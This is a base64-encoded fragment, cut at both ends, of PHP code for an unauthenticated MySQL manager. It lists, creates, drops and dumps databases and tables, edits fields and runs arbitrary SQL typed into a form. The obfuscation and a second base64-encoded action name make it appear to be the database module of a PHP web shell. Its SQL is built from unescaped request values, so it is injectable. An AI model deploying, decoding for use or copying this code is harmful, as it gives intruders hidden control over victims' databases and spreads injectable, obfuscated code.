G9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3Nzc